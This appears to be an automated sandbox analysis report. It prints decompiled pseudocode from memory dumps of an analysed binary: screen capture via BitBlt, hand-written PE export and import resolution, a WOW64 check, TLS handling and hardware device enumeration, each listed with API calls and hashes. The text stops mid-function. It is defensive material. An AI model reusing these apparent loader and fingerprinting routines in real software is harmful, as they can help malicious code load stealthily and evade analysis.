                                                                                                                                                      				BitBlt(_t23, _v16, _v12, _v44, _v40, _t24, 0, 0, 0xcc0020);
                                                                                                                                                      				SelectObject(_t24, _v56);
                                                                                                                                                      				return DeleteDC(_t24);
                                                                                                                                                      			}















                                                                                                                                                      APIs
                                                                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 004012CC
                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 004012E0
                                                                                                                                                      • GetObjectA.GDI32(?,00000018,?), ref: 004012EE
                                                                                                                                                      • BitBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,00CC0020), ref: 00401313
                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 0040131F
                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 00401322
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Object$Select$CompatibleCreateDelete
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2280115113-0
                                                                                                                                                      • Opcode ID: 97d30cea3b4848ec61989ca9b3a25616bbb10135de2f2940fa573a013330b45f
                                                                                                                                                      • Instruction ID: f2e8a14a8be1bbbb7043d571baa78ab61f6b2ffc4645eec57c6b3d27f00c4ef2
                                                                                                                                                      • Opcode Fuzzy Hash: 97d30cea3b4848ec61989ca9b3a25616bbb10135de2f2940fa573a013330b45f
                                                                                                                                                      • Instruction Fuzzy Hash: A7014B75205304BFD200AB14DD89E7FBBBCEBC9A61F004519FA55A2251C734AD058BBA
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001AEB0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				intOrPtr* _v16;
                                                                                                                                                      				intOrPtr* _v20;
                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                      				intOrPtr _v28;
                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                      				intOrPtr* _v36;
                                                                                                                                                      				intOrPtr* _v40;
                                                                                                                                                      				intOrPtr* _v44;
                                                                                                                                                      				intOrPtr* _t105;
                                                                                                                                                      				void* _t174;
                                                                                                                                                      				void* _t176;
                                                                                                                                                      
                                                                                                                                                      				_t172 = __edi;
                                                                                                                                                      				_t122 = __ebx;
                                                                                                                                                      				_v16 = _a4;
                                                                                                                                                      				_t4 = _v16 + 4; // 0x7d83ec45
                                                                                                                                                      				_v24 =  *_t4;
                                                                                                                                                      				_v12 = 0;
                                                                                                                                                      				_v20 =  *_v16 + 0x78;
                                                                                                                                                      				if( *((intOrPtr*)(_v20 + 4)) != 0) {
                                                                                                                                                      					_v8 = _v24 +  *_v20;
                                                                                                                                                      					if( *(_v8 + 0x18) == 0 ||  *((intOrPtr*)(_v8 + 0x14)) == 0) {
                                                                                                                                                      						SetLastError(0x7f);
                                                                                                                                                      						return 0;
                                                                                                                                                      					} else {
                                                                                                                                                      						if((_a8 >> 0x00000010 & 0x0000ffff) != 0) {
                                                                                                                                                      							if( *(_v8 + 0x18) != 0) {
                                                                                                                                                      								if( *((intOrPtr*)(_v16 + 0x30)) != 0) {
                                                                                                                                                      									L19:
                                                                                                                                                      									_t70 = _v16 + 0x30; // 0x51e84d8b
                                                                                                                                                      									_v28 = E1000DF58(_t122,  &_a8,  *_t70,  *(_v8 + 0x18), 8, E1001AA60);
                                                                                                                                                      									if(_v28 != 0) {
                                                                                                                                                      										_v12 =  *(_v28 + 4) & 0x0000ffff;
                                                                                                                                                      										L22:
                                                                                                                                                      										if(_v12 <=  *((intOrPtr*)(_v8 + 0x14))) {
                                                                                                                                                      											return _v24 +  *((intOrPtr*)(_v24 +  *((intOrPtr*)(_v8 + 0x1c)) + _v12 * 4));
                                                                                                                                                      										}
                                                                                                                                                      										SetLastError(0x7f);
                                                                                                                                                      										return 0;
                                                                                                                                                      									}
                                                                                                                                                      									SetLastError(0x7f);
                                                                                                                                                      									return 0;
                                                                                                                                                      								}
                                                                                                                                                      								_v36 = _v24 +  *((intOrPtr*)(_v8 + 0x20));
                                                                                                                                                      								_v40 = _v24 +  *((intOrPtr*)(_v8 + 0x24));
                                                                                                                                                      								_t105 = L1000CE56(__ebx, _v24 +  *((intOrPtr*)(_v8 + 0x24)), __edi, __esi,  *(_v8 + 0x18) << 3);
                                                                                                                                                      								_t176 = _t174 + 4;
                                                                                                                                                      								_v44 = _t105;
                                                                                                                                                      								 *((intOrPtr*)(_v16 + 0x30)) = _v44;
                                                                                                                                                      								if(_v44 != 0) {
                                                                                                                                                      									_v32 = 0;
                                                                                                                                                      									while(_v32 <  *(_v8 + 0x18)) {
                                                                                                                                                      										 *_v44 = _v24 +  *_v36;
                                                                                                                                                      										 *((short*)(_v44 + 4)) =  *_v40;
                                                                                                                                                      										_v32 = _v32 + 1;
                                                                                                                                                      										_v36 = _v36 + 4;
                                                                                                                                                      										_v40 = _v40 + 2;
                                                                                                                                                      										_v44 = _v44 + 8;
                                                                                                                                                      									}
                                                                                                                                                      									_t66 = _v16 + 0x30; // 0x51e84d8b
                                                                                                                                                      									E1000D9D0( *(_v8 + 0x18), _t172,  *_t66,  *(_v8 + 0x18), 8, E1001AA90);
                                                                                                                                                      									_t174 = _t176 + 0x10;
                                                                                                                                                      									goto L19;
                                                                                                                                                      								}
                                                                                                                                                      								SetLastError(0xe);
                                                                                                                                                      								return 0;
                                                                                                                                                      							}
                                                                                                                                                      							SetLastError(0x7f);
                                                                                                                                                      							return 0;
                                                                                                                                                      						}
                                                                                                                                                      						if((_a8 & 0xffff) >=  *((intOrPtr*)(_v8 + 0x10))) {
                                                                                                                                                      							_v12 = (_a8 & 0xffff) -  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                      							goto L22;
                                                                                                                                                      						}
                                                                                                                                                      						SetLastError(0x7f);
                                                                                                                                                      						return 0;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				SetLastError(0x7f);
                                                                                                                                                      				return 0;
                                                                                                                                                      			}
















                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001af43
                                                                                                                                                      0x1001af01
                                                                                                                                                      0x1001aee2
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,100207FE), ref: 1001AEE2
                                                                                                                                                      • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,100207FE), ref: 1001AF0E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1452528299-0
                                                                                                                                                      • Opcode ID: 0f455f5a677937442b34762e6ef3df5d8741d0011f32a81b29d44a10479100eb
                                                                                                                                                      • Instruction ID: 0b553024b132d835b53bcc3061d3cd906e00f9f3519ff007c74d2c873b7cba87
                                                                                                                                                      • Opcode Fuzzy Hash: 0f455f5a677937442b34762e6ef3df5d8741d0011f32a81b29d44a10479100eb
                                                                                                                                                      • Instruction Fuzzy Hash: A071D274A00249EFDB04CF94C994AAEB7F1FF48304F618199E915AB341D735EE81CBA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 59%
                                                                                                                                                      			E00401070() {
                                                                                                                                                      				char _v4;
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				struct HINSTANCE__* _t3;
                                                                                                                                                      				_Unknown_base(*)()* _t4;
                                                                                                                                                      				void* _t5;
                                                                                                                                                      				signed int _t6;
                                                                                                                                                      				_Unknown_base(*)()* _t11;
                                                                                                                                                      
                                                                                                                                                      				_t3 = GetModuleHandleA("Kernel32.dll");
                                                                                                                                                      				if(_t3 != 0) {
                                                                                                                                                      					_t4 = GetProcAddress(_t3, "IsWow64Process");
                                                                                                                                                      					_t11 = _t4;
                                                                                                                                                      					if(_t11 != 0) {
                                                                                                                                                      						_t5 = GetCurrentProcess();
                                                                                                                                                      						if(_t5 != 0) {
                                                                                                                                                      							_t6 =  *_t11(_t5,  &_v4);
                                                                                                                                                      							asm("sbb eax, eax");
                                                                                                                                                      							return  ~_t6 & _v12;
                                                                                                                                                      						} else {
                                                                                                                                                      							return _t5;
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      						return _t4;
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					return _t3;
                                                                                                                                                      				}
                                                                                                                                                      			}











                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleA.KERNEL32(Kernel32.dll), ref: 00401077
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040108A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                      • String ID: IsWow64Process$Kernel32.dll
                                                                                                                                                      • API String ID: 1646373207-2893920747
                                                                                                                                                      • Opcode ID: de38f9ad0efdbed7fc00bdec0d918f1e73f141aa4d7654630022051159688da3
                                                                                                                                                      • Instruction ID: 0f79affc76f9381138ebf103281d235305e31b8f574dc99244aa29f60611ee23
                                                                                                                                                      • Opcode Fuzzy Hash: de38f9ad0efdbed7fc00bdec0d918f1e73f141aa4d7654630022051159688da3
                                                                                                                                                      • Instruction Fuzzy Hash: EEE09BB36512216FD62417B8BC09EE76798DD90B63324453FF543E65D0EF3CD8405698
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 60%
                                                                                                                                                      			E10013389(void* __ebx, void* __esi) {
                                                                                                                                                      				void* _t1;
                                                                                                                                                      				long _t5;
                                                                                                                                                      				void* _t9;
                                                                                                                                                      				void* _t11;
                                                                                                                                                      				void* _t15;
                                                                                                                                                      
                                                                                                                                                      				_t9 = __ebx;
                                                                                                                                                      				_t1 = TlsGetValue( *0x10332c6c);
                                                                                                                                                      				_t16 = _t1;
                                                                                                                                                      				if(_t1 != 0) {
                                                                                                                                                      					_push( *0x10332c68);
                                                                                                                                                      					_t11 =  *(TlsGetValue( *0x10332c6c))();
                                                                                                                                                      				}
                                                                                                                                                      				_pop(_t15);
                                                                                                                                                      				_push(0);
                                                                                                                                                      				_push( *0x10332c68);
                                                                                                                                                      				 *((intOrPtr*)(E10013034( *0x10333820)))();
                                                                                                                                                      				_push(_t11);
                                                                                                                                                      				L10013256(_t9, _t11, _t15, _t16);
                                                                                                                                                      				_t5 =  *0x10332c6c; // 0x1d
                                                                                                                                                      				if(_t5 != 0xffffffff) {
                                                                                                                                                      					return TlsSetValue(_t5, 0);
                                                                                                                                                      				}
                                                                                                                                                      				return _t5;
                                                                                                                                                      			}









                                                                                                                                                      APIs
                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 10013396
                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 100133A8
                                                                                                                                                      • __decode_pointer.LIBCMT ref: 100133BD
                                                                                                                                                      • TlsSetValue.KERNEL32(0000001D,00000000,1000EAC9,00000000,?,?,00000001,?,?,1000EB2D,00000001,?,?,10330240,0000000C,1000EBE7), ref: 100133D9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Value$__decode_pointer
                                                                                                                                                      • String ID: tj
                                                                                                                                                      • API String ID: 3389472636-3491506833
                                                                                                                                                      • Opcode ID: 98b685037422a500dab51c28cbe3472850961789b495b2f1d75dbfea88fe638a
                                                                                                                                                      • Instruction ID: a5e655cd75536ae3ffa2bd70bd2a424c71ddb38a18ae7223bb1ec647065a0f02
                                                                                                                                                      • Opcode Fuzzy Hash: 98b685037422a500dab51c28cbe3472850961789b495b2f1d75dbfea88fe638a
                                                                                                                                                      • Instruction Fuzzy Hash: CDE06D31500120AEDA12A768DCC4B5D3FAAFB84260F249111F418DE1B1CF31DE96DA54
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 33%
                                                                                                                                                      			E10019960(void* __ebx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      				char _v44;
                                                                                                                                                      				char _v48;
                                                                                                                                                      				char _v312;
                                                                                                                                                      				char _v572;
                                                                                                                                                      				char _v832;
                                                                                                                                                      				char _v1092;
                                                                                                                                                      				char _v1352;
                                                                                                                                                      				char _v1368;
                                                                                                                                                      				char _v1372;
                                                                                                                                                      				intOrPtr _v1376;
                                                                                                                                                      				intOrPtr _v1380;
                                                                                                                                                      				signed int _v1384;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				void* __ebp;
                                                                                                                                                      				intOrPtr _t74;
                                                                                                                                                      				intOrPtr _t80;
                                                                                                                                                      				void* _t85;
                                                                                                                                                      				void* _t88;
                                                                                                                                                      				void* _t91;
                                                                                                                                                      				void* _t94;
                                                                                                                                                      				void* _t97;
                                                                                                                                                      				void* _t116;
                                                                                                                                                      				signed int _t150;
                                                                                                                                                      				void* _t164;
                                                                                                                                                      				void* _t168;
                                                                                                                                                      				void* _t171;
                                                                                                                                                      				void* _t174;
                                                                                                                                                      				void* _t177;
                                                                                                                                                      				void* _t180;
                                                                                                                                                      				void* _t182;
                                                                                                                                                      				void* _t183;
                                                                                                                                                      				void* _t184;
                                                                                                                                                      				void* _t185;
                                                                                                                                                      				void* _t186;
                                                                                                                                                      				intOrPtr _t187;
                                                                                                                                                      				void* _t188;
                                                                                                                                                      				void* _t189;
                                                                                                                                                      				void* _t191;
                                                                                                                                                      				void* _t193;
                                                                                                                                                      				void* _t194;
                                                                                                                                                      				void* _t196;
                                                                                                                                                      				void* _t197;
                                                                                                                                                      				void* _t199;
                                                                                                                                                      				void* _t200;
                                                                                                                                                      				void* _t202;
                                                                                                                                                      				void* _t203;
                                                                                                                                                      
                                                                                                                                                      				_t116 = __ebx;
                                                                                                                                                      				 *[fs:0x0] = _t187;
                                                                                                                                                      				_t188 = _t187 - 0x558;
                                                                                                                                                      				_v1384 = 0;
                                                                                                                                                      				_t74 = E10003170( &_v1368, __eflags);
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v1376 = 0;
                                                                                                                                                      				_v48 = 0;
                                                                                                                                                      				_v1372 = 0;
                                                                                                                                                      				__imp__SetupDiGetClassDevsA(0, 0, 0, 6, _t164, _t180,  *[fs:0x0], E10022A8C, 0xffffffff);
                                                                                                                                                      				_v1380 = _t74;
                                                                                                                                                      				if(_v1380 != 0xffffffff) {
                                                                                                                                                      					E1000CF20(_t164,  &_v44, 0, 0x1c);
                                                                                                                                                      					_t189 = _t188 + 0xc;
                                                                                                                                                      					_v44 = 0x1c;
                                                                                                                                                      					while(1) {
                                                                                                                                                      						_t148 = _v1376;
                                                                                                                                                      						_t80 = _v1380;
                                                                                                                                                      						__imp__SetupDiEnumDeviceInfo(_t80, _v1376,  &_v44);
                                                                                                                                                      						if(_t80 == 0) {
                                                                                                                                                      							break;
                                                                                                                                                      						}
                                                                                                                                                      						E1000CF20(_t164,  &_v1352, 0, 0x514);
                                                                                                                                                      						_push( &_v1372);
                                                                                                                                                      						_push( &_v48);
                                                                                                                                                      						_push(0);
                                                                                                                                                      						_t191 = _t189 + 0xc - 0x1c;
                                                                                                                                                      						_t182 =  &_v44;
                                                                                                                                                      						memcpy(_t191, _t182, 7 << 2);
                                                                                                                                                      						_t168 = _t182 + 0xe;
                                                                                                                                                      						_push(_v1380);
                                                                                                                                                      						_t85 = E10019780(_t116, _t182);
                                                                                                                                                      						_t193 = _t191 + 0x38;
                                                                                                                                                      						_t213 = _t85;
                                                                                                                                                      						if(_t85 != 0) {
                                                                                                                                                      							E1000D190(_t116, _t168, _t182,  &_v1352, _v48, _v1372);
                                                                                                                                                      							_push(_v48);
                                                                                                                                                      							E1000CA30(_t116, _t168, _t182, _t213);
                                                                                                                                                      							_t193 = _t193 + 0x10;
                                                                                                                                                      						}
                                                                                                                                                      						_push( &_v1372);
                                                                                                                                                      						_push( &_v48);
                                                                                                                                                      						_push(7);
                                                                                                                                                      						_t194 = _t193 - 0x1c;
                                                                                                                                                      						_t183 =  &_v44;
                                                                                                                                                      						memcpy(_t194, _t183, 7 << 2);
                                                                                                                                                      						_t171 = _t183 + 0xe;
                                                                                                                                                      						_push(_v1380);
                                                                                                                                                      						_t88 = E10019780(_t116, _t183);
                                                                                                                                                      						_t196 = _t194 + 0x38;
                                                                                                                                                      						_t214 = _t88;
                                                                                                                                                      						if(_t88 != 0) {
                                                                                                                                                      							E1000D190(_t116, _t171, _t183,  &_v1092, _v48, _v1372);
                                                                                                                                                      							_push(_v48);
                                                                                                                                                      							E1000CA30(_t116, _t171, _t183, _t214);
                                                                                                                                                      							_t196 = _t196 + 0x10;
                                                                                                                                                      						}
                                                                                                                                                      						_push( &_v1372);
                                                                                                                                                      						_push( &_v48);
                                                                                                                                                      						_push(0x16);
                                                                                                                                                      						_t197 = _t196 - 0x1c;
                                                                                                                                                      						_t184 =  &_v44;
                                                                                                                                                      						memcpy(_t197, _t184, 7 << 2);
                                                                                                                                                      						_t174 = _t184 + 0xe;
                                                                                                                                                      						_push(_v1380);
                                                                                                                                                      						_t91 = E10019780(_t116, _t184);
                                                                                                                                                      						_t199 = _t197 + 0x38;
                                                                                                                                                      						_t215 = _t91;
                                                                                                                                                      						if(_t91 != 0) {
                                                                                                                                                      							E1000D190(_t116, _t174, _t184,  &_v832, _v48, _v1372);
                                                                                                                                                      							_push(_v48);
                                                                                                                                                      							E1000CA30(_t116, _t174, _t184, _t215);
                                                                                                                                                      							_t199 = _t199 + 0x10;
                                                                                                                                                      						}
                                                                                                                                                      						_push( &_v1372);
                                                                                                                                                      						_push( &_v48);
                                                                                                                                                      						_push(0xc);
                                                                                                                                                      						_t200 = _t199 - 0x1c;
                                                                                                                                                      						_t185 =  &_v44;
                                                                                                                                                      						memcpy(_t200, _t185, 7 << 2);
                                                                                                                                                      						_t177 = _t185 + 0xe;
                                                                                                                                                      						_push(_v1380);
                                                                                                                                                      						_t94 = E10019780(_t116, _t185);
                                                                                                                                                      						_t202 = _t200 + 0x38;
                                                                                                                                                      						_t216 = _t94;
                                                                                                                                                      						if(_t94 != 0) {
                                                                                                                                                      							E1000D190(_t116, _t177, _t185,  &_v572, _v48, _v1372);
                                                                                                                                                      							_push(_v48);
                                                                                                                                                      							E1000CA30(_t116, _t177, _t185, _t216);
                                                                                                                                                      							_t202 = _t202 + 0x10;
                                                                                                                                                      						}
                                                                                                                                                      						_push( &_v1372);
                                                                                                                                                      						_push( &_v48);
                                                                                                                                                      						_push(8);
                                                                                                                                                      						_t203 = _t202 - 0x1c;
                                                                                                                                                      						_t186 =  &_v44;
                                                                                                                                                      						memcpy(_t203, _t186, 7 << 2);
                                                                                                                                                      						_t164 = _t186 + 0xe;
                                                                                                                                                      						_push(_v1380);
                                                                                                                                                      						_t97 = E10019780(_t116, _t186);
                                                                                                                                                      						_t189 = _t203 + 0x38;
                                                                                                                                                      						_t217 = _t97;
                                                                                                                                                      						if(_t97 != 0) {
                                                                                                                                                      							E1000D190(_t116, _t164, _t186,  &_v312, _v48, _v1372);
                                                                                                                                                      							_push(_v48);
                                                                                                                                                      							E1000CA30(_t116, _t164, _t186, _t217);
                                                                                                                                                      							_t189 = _t189 + 0x10;
                                                                                                                                                      						}
                                                                                                                                                      						_v1376 = _v1376 + 1;
                                                                                                                                                      						E10003310( &_v1368,  &_v1352, _t217,  &_v1352);
                                                                                                                                                      					}
                                                                                                                                                      					__imp__SetupDiDestroyDeviceInfoList(_v1380);
                                                                                                                                                      				}
                                                                                                                                                      				E100031A0(_a4, _t148, __eflags,  &_v1368);
                                                                                                                                                      				_t150 = _v1384 | 0x00000001;
                                                                                                                                                      				__eflags = _t150;
                                                                                                                                                      				_v1384 = _t150;
                                                                                                                                                      				_v8 = 0xffffffff;
                                                                                                                                                      				E10003280( &_v1368);
                                                                                                                                                      				 *[fs:0x0] = _v16;
                                                                                                                                                      				return _a4;
                                                                                                                                                      			}





















































                                                                                                                                                      APIs
                                                                                                                                                      • SetupDiGetClassDevsA.SETUPAPI(00000000,00000000,00000000,00000006), ref: 100199BF
                                                                                                                                                      • _memset.LIBCMT ref: 100199E0
                                                                                                                                                      • SetupDiEnumDeviceInfo.SETUPAPI(000000FF,00000000,0000001C), ref: 10019A01
                                                                                                                                                      • _memset.LIBCMT ref: 10019A1D
                                                                                                                                                        • Part of subcall function 10019780: SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,?,00000000,00000000,00000000,?), ref: 100197AC
                                                                                                                                                        • Part of subcall function 10019780: GetLastError.KERNEL32 ref: 100197B2
                                                                                                                                                        • Part of subcall function 10019780: _memset.LIBCMT ref: 100197DE
                                                                                                                                                        • Part of subcall function 10019780: SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,00000000,00000000,?,?,00000000), ref: 10019804
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                        • Part of subcall function 1000CA30: HeapFree.KERNEL32(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                        • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                      • SetupDiDestroyDeviceInfoList.SETUPAPI(000000FF), ref: 10019BFB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Setup$Device$_memset$ErrorInfoLastPropertyRegistry$ClassDestroyDevsEnumFreeHeapList___sbh_find_block___sbh_free_block
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3323326763-0
                                                                                                                                                      • Opcode ID: 53c7cd514117aaf68dad39138555ea45b1c930409595366208031e98964e654d
                                                                                                                                                      • Instruction ID: 92146aaf36cf8da670849d236f9b8fe300c912f778ed1f5ba4bfc820bf5b102a
                                                                                                                                                      • Opcode Fuzzy Hash: 53c7cd514117aaf68dad39138555ea45b1c930409595366208031e98964e654d
                                                                                                                                                      • Instruction Fuzzy Hash: 7381B676D006089BDB14DBA4DC51FEFB379EB48311F048198F509B7281EB35AA85CFA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 34%
                                                                                                                                                      			E1001AB60(intOrPtr* _a4) {
                                                                                                                                                      				void* _v8;
                                                                                                                                                      				intOrPtr* _v12;
                                                                                                                                                      				void* _v16;
                                                                                                                                                      				intOrPtr _v20;
                                                                                                                                                      				void* _v24;
                                                                                                                                                      				void* _v28;
                                                                                                                                                      				signed int* _v32;
                                                                                                                                                      				void* _v36;
                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                      				void* __ebp;
                                                                                                                                                      				void* _t108;
                                                                                                                                                      				void* _t110;
                                                                                                                                                      				void* _t113;
                                                                                                                                                      				void* _t115;
                                                                                                                                                      				void* _t122;
                                                                                                                                                      				void* _t130;
                                                                                                                                                      				void _t132;
                                                                                                                                                      				void _t137;
                                                                                                                                                      				void* _t144;
                                                                                                                                                      				void* _t159;
                                                                                                                                                      				void* _t194;
                                                                                                                                                      				void* _t201;
                                                                                                                                                      				void* _t202;
                                                                                                                                                      				void* _t203;
                                                                                                                                                      				void* _t204;
                                                                                                                                                      
                                                                                                                                                      				_t2 = _a4 + 4; // 0xe90575c0
                                                                                                                                                      				_v20 =  *_t2;
                                                                                                                                                      				_v16 = 1;
                                                                                                                                                      				_v12 =  *_a4 + 0x80;
                                                                                                                                                      				if( *((intOrPtr*)(_v12 + 4)) != 0) {
                                                                                                                                                      					_v8 = _v20 +  *_v12;
                                                                                                                                                      					while(1) {
                                                                                                                                                      						_t108 = IsBadReadPtr(_v8, 0x14);
                                                                                                                                                      						__eflags = _t108;
                                                                                                                                                      						if(_t108 != 0) {
                                                                                                                                                      							break;
                                                                                                                                                      						}
                                                                                                                                                      						_t110 = _v8;
                                                                                                                                                      						__eflags =  *(_t110 + 0xc);
                                                                                                                                                      						if( *(_t110 + 0xc) == 0) {
                                                                                                                                                      							break;
                                                                                                                                                      						}
                                                                                                                                                      						_t18 = _a4 + 0x34; // 0x118bb84d
                                                                                                                                                      						_t23 = _a4 + 0x24; // 0xf3c7e850
                                                                                                                                                      						_t113 =  *((intOrPtr*)( *_t23))(_v20 +  *((intOrPtr*)(_v8 + 0xc)),  *_t18);
                                                                                                                                                      						_t204 = _t203 + 8;
                                                                                                                                                      						_v36 = _t113;
                                                                                                                                                      						__eflags = _v36;
                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                      							_t28 = _a4 + 0xc; // 0x52b8558b
                                                                                                                                                      							_push(4 +  *_t28 * 4);
                                                                                                                                                      							_t32 = _a4 + 8; // 0x98
                                                                                                                                                      							_push( *_t32);
                                                                                                                                                      							_t115 = E1000E018(_t144,  *_t32, _t201, _t202, __eflags);
                                                                                                                                                      							_t203 = _t204 + 8;
                                                                                                                                                      							_v28 = _t115;
                                                                                                                                                      							__eflags = _v28;
                                                                                                                                                      							if(_v28 != 0) {
                                                                                                                                                      								 *(_a4 + 8) = _v28;
                                                                                                                                                      								_t45 = _a4 + 0xc; // 0x52b8558b
                                                                                                                                                      								_t47 = _a4 + 8; // 0x98
                                                                                                                                                      								 *((intOrPtr*)( *_t47 +  *_t45 * 4)) = _v36;
                                                                                                                                                      								_t52 = _a4 + 0xc; // 0x52b8558b
                                                                                                                                                      								 *(_a4 + 0xc) =  *_t52 + 1;
                                                                                                                                                      								__eflags =  *_v8;
                                                                                                                                                      								if( *_v8 == 0) {
                                                                                                                                                      									_v32 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                      									_t122 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                      									__eflags = _t122;
                                                                                                                                                      									_v24 = _t122;
                                                                                                                                                      								} else {
                                                                                                                                                      									_v32 = _v20 +  *_v8;
